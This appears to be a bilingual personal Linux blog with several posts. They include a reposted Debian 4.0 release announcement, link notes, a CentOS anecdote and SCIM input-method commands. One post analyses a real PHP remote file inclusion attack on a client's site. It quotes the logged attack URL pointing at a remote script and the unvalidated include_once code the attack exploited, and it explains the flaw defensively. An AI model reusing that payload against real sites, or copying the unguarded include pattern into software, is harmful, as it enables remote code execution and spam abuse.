まだ逆境か？夢をあきらめないで

為慶祝DEBIAN 4.0 released，Debian HK今日下午3時在又一城辦了一個聚會，

本人今日有幸能抽空出席。在聚會中，認識了不少LINUX的愛好者，

大家彼此交流了不少LINUX的經驗和知識， 是一個很好的聚會。

Debian Etch finally released on 8th April, 2007.
Here is the notice from debian-announce@lists.debian.org.

Debian GNU/Linux 4.0 released

The Debian Project is pleased to announce the official release of Debian
GNU/Linux version 4.0, codenamed "etch", after 21 months of constant
development.  Debian GNU/Linux is a free operating system which supports
a total of eleven processor architectures and includes the KDE, GNOME
and Xfce desktop environments.  It also features cryptographic software
and compatibility with the FHS v2.3 and software developed for version
3.1 of the LSB.

Using a now fully integrated installation process, Debian GNU/Linux 4.0
comes with out-of-the-box support for encrypted partitions.  This
release introduces a newly developed graphical frontend to the
installation system supporting scripts using composed characters and
complex languages; the installation system for Debian GNU/Linux has now
been translated to 58 languages.

Also beginning with Debian GNU/Linux 4.0, the package management system
has been improved regarding security and efficiency.  Secure APT allows
the verification of the integrity of packages downloaded from a mirror.
Updated package indices won't be downloaded in their entirety, but
instead patched with smaller files containing only differences from
earlier versions.

Debian GNU/Linux runs on computers ranging from palmtops and handheld
systems to supercomputers, and on nearly everything in between.  A total
of eleven architectures are supported including:  Sun SPARC (sparc), HP
Alpha (alpha), Motorola/IBM PowerPC (powerpc), Intel IA-32 (i386) and
IA-64 (ia64), HP PA-RISC (hppa), MIPS (mips, mipsel), ARM (arm), IBM
S/390 (s390) and -- newly introduced with Debian GNU/Linux 4.0 -- AMD64
and Intel EM64T (amd64).

Debian GNU/Linux can be installed from various installation media such
as DVDs, CDs, USB sticks and floppies, or from the network.  GNOME is
the default desktop environment and is contained on the first CD.  The K
Desktop Environment (KDE) and the Xfce desktop can be installed through
two new alternative CD images.  Also newly available with Debian
GNU/Linux 4.0 are multi-arch CDs and DVDs supporting installation of
multiple architectures from a single disc.

Debian GNU/Linux can be downloaded right now via bittorent (the
recommended way), jigdo or HTTP;  see <http://www.debian.org/CD/> for
further information.  It will soon be available on DVD and CD-ROM from
numerous vendors <http://www.debian.org/CD/vendors/>, too.

This release includes a number of updated software packages, such as the
K Desktop Environment 3.5 (KDE), an updated version of the GNOME desktop
environment 2.14, the Xfce 4.4 desktop environment, the GNUstep desktop
5.2, X.Org 7.1, OpenOffice.org 2.0.4a, GIMP 2.2.13, Iceweasel (an
unbranded version of Mozilla Firefox 2.0.0.3), Icedove (an unbranded
version of Mozilla Thunderbird 1.5), Iceape (an unbranded version of
Mozilla Seamonkey 1.0.8), PostgreSQL 8.1.8, MySQL 5.0.32, GNU Compiler
Collection 4.1.1, Linux kernel version 2.6.18, Apache 2.2.3, Samba
3.0.24, Python 2.4.4 and 2.5, Perl 5.8.8, PHP 4.4.4 and 5.2.0, Asterisk
1.2.13, and more than 18,000 other ready to use software packages.

Upgrades to Debian GNU/Linux 4.0 from the previous release, Debian
GNU/Linux 3.1 codenamed "sarge", are automatically handled by the
aptitude package management tool for most configurations, and to a
certain degree also by the apt-get package management tool.  As always,
Debian GNU/Linux systems can be upgraded quite painlessly, in place,
without any forced downtime, but it is strongly recommended to read the
release notes for possible issues.  For detailed instructions about
installing and upgrading Debian GNU/Linux, please see the release notes
<http://www.debian.org/releases/etch/releasenotes>.  Please note that
the release notes will be further improved and translated to additional
languages in the coming weeks.

About Debian
------------

Debian GNU/Linux is a free operating system, developed by more than
a thousand volunteers from all over the world who collaborate via the
Internet.  Debian's dedication to Free Software, its non-profit nature,
and its open development model make it unique among GNU/Linux
distributions.

The Debian project's key strengths are its volunteer base, its dedication
to the Debian Social Contract, and its commitment to provide the best
operating system possible.  Debian 4.0 is another important step in that
direction.

Contact Information
-------------------

For further information, please visit the Debian web pages at
<http://www.debian.org/> or send mail to <press@debian.org>.

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];
…
?>
…
<?php include_once(”{$pagename}_main.inc”);?>
…


The problem is that the $pagename does not have any gruad to check the value that got by $_Get['name'].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>


That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.

自升大學3年之後到現在， 差不多有3年停了手上的OPEN SOURCE PROJECT。
最近不知怎的忽然想開一些新的PROJECT。

前陣子有空， 把基地LINUX版的版圖換了一個新的，感覺清新了不少，
雖版內沒什麼人氣。

Linux及自由軟體–遊戲基地（討論區）http://forum.gamebase.com.tw/board.jsp?l=2009&no=37008

To use deb rather than source.
http://www.debian-administration.org/articles/78

Article from Linux Gazette to say how to prevent DDoS attacks.

http://linuxgazette.net/126/cherian.html

http://www.centos.org/modules/news/article.php?storyid=127

這是真人真事。一日CentOS團隊收到一封政府的電郵。
某鎮政府去信centos, 說他們的website給centos的人hack了.
而政府發言人所看到的, 是centos3 apache的test page.
像這頁:
http://centos.hughesjr.com/testing/noindex_new.html
並威脅CentOS開發人員若在12小時內不修理好, 就找FBI.

http://www.centos.org/modules/news/article.php?storyid=127

世事真是無奇不有。

Use update-alternatives to change the xinput setting so that can use SCIM in en_GB enviroment.

# update-alternatives –install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-anthy 60
# update-alternatives –install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-canna 50
# update-alternatives –install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-prime 50
# update-alternatives –install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-skk 50
# update-alternatives –install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/none 10

http://yblog.org/archive/index.php/6055#trackback

cabextract
http://www.kyz.uklinux.net/cabextract.php

ies4linux
http://www.tatanka.com.br/ies4linux/en/instructions/